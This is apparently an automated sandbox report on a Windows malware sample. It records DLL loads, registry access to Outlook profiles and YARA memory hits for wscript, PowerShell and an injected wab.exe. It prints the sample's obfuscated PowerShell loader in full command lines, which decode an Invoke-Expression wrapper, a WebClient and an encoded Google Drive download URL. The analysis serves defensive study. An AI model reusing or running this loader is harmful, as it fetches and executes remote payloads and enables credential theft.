Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Binary string: ore.pdb source: powershell.exe, 00000013.00000002.2384489438.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: ysaPFN.exe.21.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000013.00000002.2390567297.00000000070F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: ysaPFN.exe.21.dr

Data Obfuscation

barindex
Source: Yara match File source: 00000013.00000002.2396771589.00000000096C9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2394868594.0000000008450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2387916097.0000000005999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2543561723.00000262DBFD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Arbejdsdelings)$global:fodrodsknoglerne = [System.Text.Encoding]::ASCII.GetString($Indskrifternes)$global:Hairbands=$fodrodsknoglerne.substring($Trellised,$Christianias26)<#Sinningia
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Bryophytes $Caradhrasvailably $Seepages), (Udpinde @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Arnee77 = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Markrflytningers)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Forkammervgs, $false).DefineType($Skarnb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Arbejdsdelings)$global:fodrodsknoglerne = [System.Text.Encoding]::ASCII.GetString($Indskrifternes)$global:Hairbands=$fodrodsknoglerne.substring($Trellised,$Christianias26)<#Sinningia
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo 